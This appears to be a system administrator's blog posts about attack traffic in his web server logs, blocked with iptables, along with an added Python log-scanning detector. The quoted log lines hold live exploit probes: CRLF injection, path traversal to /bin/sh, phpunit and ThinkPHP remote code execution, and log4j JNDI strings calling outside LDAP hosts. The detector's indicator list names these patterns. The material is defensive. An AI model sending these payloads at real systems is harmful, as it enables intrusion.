Nuclei – Open-source project

I saw this log line:

104.168.102.21 - - [17/Jan/2022:00:20:25 +0100] "GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1" 302 5553 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"

My reflex:

iptables -A INPUT -s 104.168.102.21 -j DROP

Logs of an attack from a Russian IP (45.146.165.37)

The requests are spaced out over time so as not to get blocked.
Here are the logs:

45.146.165.37 - - [04/Jan/2022:00:09:45 +0100] "GET / HTTP/1.1" 302 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:00:09:52 +0100] "GET /user/auth/login HTTP/1.1" 200 13390 "https://80.15.48.50:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:01:41:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 5635 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:03:24:01 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:03:24:01 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "http://80.15.48.50:80/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:03:57:36 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:03:57:50 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "http://80.15.48.50:80/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:04:14:43 +0100] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:04:14:43 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "http://80.15.48.50:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:04:59:21 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:04:59:22 +0100] "GET /user/auth/login HTTP/1.1" 200 8193 "http://80.15.48.50:80/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:05:56:50 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:05:56:51 +0100] "GET /user/auth/login HTTP/1.1" 200 8195 "http://80.15.48.50:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:07:45:21 +0100] "GET /_ignition/execute-solution HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:07:45:22 +0100] "GET /user/auth/login HTTP/1.1" 200 8194 "http://80.15.48.50:80/_ignition/execute-solution" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:08:44:47 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 485 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:09:07:16 +0100] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:09:07:17 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "http://80.15.48.50:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:09:47:57 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 5369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:11:53:49 +0100] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:13:06:48 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 5557 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:13:07:05 +0100] "GET /user/auth/login HTTP/1.1" 200 13388 "https://80.15.48.50:443/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [04/Jan/2022:13:52:16 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 302 5369 "https://80.15.48.50:443" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

What needs to be done:

iptables -A INPUT -s 45.146.165.37 -j DROP

List of IPs blocked via /etc/iptables/rules.v4

Here is the list of IPs I block:

# cat /etc/iptables/rules.v4 | grep "\-j DROP"

Which gives, by country:

# grep "DROP" /etc/iptables/rules.v4 | awk '{print $4}' | cut -d/ -f1 | xargs -n 1 geoiplookup | sort | uniq -c | sort -n | sed 's/ GeoIP Country Edition://g'
      1 AL, Albania
      1 AR, Argentina
      1 AT, Austria
      1 CZ, Czech Republic
      1 DK, Denmark
      1 GR, Greece
      1 IE, Ireland
      1 MD, Moldova, Republic of
      1 PE, Peru
      1 PH, Philippines
      1 TT, Trinidad and Tobago
      1 UG, Uganda
      2 BA, Bosnia and Herzegovina
      2 ID, Indonesia
      2 IR, Iran, Islamic Republic of
      2 IT, Italy
      2 JP, Japan
      2 MX, Mexico
      2 MY, Malaysia
      2 SG, Singapore
      2 TR, Turkey
      2 TW, Taiwan
      3 SE, Sweden
      3 VN, Vietnam
      4 BR, Brazil
      4 EG, Egypt
      5 FR, France
      6 GB, United Kingdom
      6 KR, Korea, Republic of
      7 CA, Canada
      7 SC, Seychelles
      8 NL, Netherlands
      9 DE, Germany
     10 RU, Russian Federation
     12 IN, India
     22 IP Address not found
     47 CN, China
    139 US, United States

USA first... Misery.

Audit of the IPs carrying out log4j attacks

A quick search through the logs:

170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 302 5113 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET / HTTP/1.1" 302 5113 "-" "${jndi:ldap://185.224.139.151:1389/Exploit}"
139.59.70.139 - - [16/Dec/2021:12:36:32 +0100] "GET / HTTP/1.0" 301 558 "${jndi:ldap://159.223.5.30:1389/a}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a}"

So I blocked the IPs:

# iptables -A INPUT -s 170.210.45.163 -j DROP
# iptables -A INPUT -s 139.59.70.139 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Misery.
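A defender-side detector for the patterns quoted in these posts (the Nuclei user-agent and CRLF probe, the .%2e/ traversal, the phpunit and ThinkPHP probes, and the ${jndi:...} strings that arrived in the request line, the referer and the user-agent), written here as an added example rather than anything taken from the posts themselves. It assumes Apache combined log format; the sample lines are copied from the posts plus one constructed benign request, and the existing-rules list is a constructed stand-in for the DROP lines of rules.v4 so that IPs already blocked are not added twice.

```python
import re

# Apache "combined" format: ip - user [time] "request" status size "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Case-insensitive substrings taken from the log lines quoted in the posts; each is checked
# against request line, referer and user-agent alike, since the log4j probes used all three.
INDICATORS = {
    "nuclei-scanner": "nuclei",
    "crlf-injection": "%0d%0a",
    "path-traversal": ".%2e/",
    "phpunit-rce": "eval-stdin.php",
    "thinkphp-rce": "invokefunction",
    "log4j-jndi": "${jndi:",
}

# Constructed sample: three lines copied from the posts plus one benign request (203.0.113.7).
SAMPLE_LOG = [
    '104.168.102.21 - - [17/Jan/2022:00:20:25 +0100] "GET /%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1" 302 5553 "-" "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"',
    '45.146.165.37 - - [04/Jan/2022:01:41:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 5635 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '203.0.113.7 - - [04/Jan/2022:09:00:00 +0100] "GET /user/auth/login HTTP/1.1" 200 8198 "-" "Mozilla/5.0"',
    '170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET / HTTP/1.1" 302 5113 "-" "${jndi:ldap://185.224.139.151:1389/Exploit}"',
]

# Constructed stand-in for the DROP lines of /etc/iptables/rules.v4 (note the duplicate entry).
EXISTING_RULES = [
    "-A INPUT -s 45.146.165.37/32 -j DROP",
    "-A INPUT -s 45.146.165.37/32 -j DROP",
    "-A LOG_DROP -j DROP",
]

def parse_line(line):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(entry):
    """Names of the indicators found in the attacker-controlled fields of one entry."""
    haystack = " ".join((entry["request"], entry["referer"], entry["ua"])).lower()
    return sorted(name for name, needle in INDICATORS.items() if needle in haystack)

def scan(lines):
    """Map each offending source IP to the set of indicators seen, in first-seen order."""
    hits = {}
    for line in lines:
        entry = parse_line(line)
        if entry is not None and (tags := classify(entry)):
            hits.setdefault(entry["ip"], set()).update(tags)
    return hits

def drop_rules(hits, existing_rules=()):
    """iptables DROP rules for the offending IPs, minus those already present in rules.v4."""
    already = set()
    for rule in existing_rules:
        m = re.match(r"-A INPUT -s (\S+?)(?:/32)? -j DROP$", rule.strip())
        if m:
            already.add(m.group(1))
    return [f"-A INPUT -s {ip}/32 -j DROP" for ip in hits if ip not in already]

if __name__ == "__main__":
    for rule in drop_rules(scan(SAMPLE_LOG), EXISTING_RULES):
        print(rule)
```

The rules it prints are in rules.v4 syntax, so they can be reviewed and appended to the file before an iptables-restore, instead of being typed one by one and saved afterwards with iptables-save.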

IP Address:   170.210.45.163
Country:      Argentina
Region:       Ciudad Autonoma de Buenos Aires
City:         Buenos Aires
ISP:          Red de Interconexion Universitaria
Organization: Not Available
Latitude:     -34.6132
Longitude:    -58.3772

IP Address:   139.59.70.139
Country:      India
Region:       Karnataka
City:         Bengaluru
ISP:          DigitalOcean LLC
Organization: Not Available
Latitude:     12.9762
Longitude:    77.6033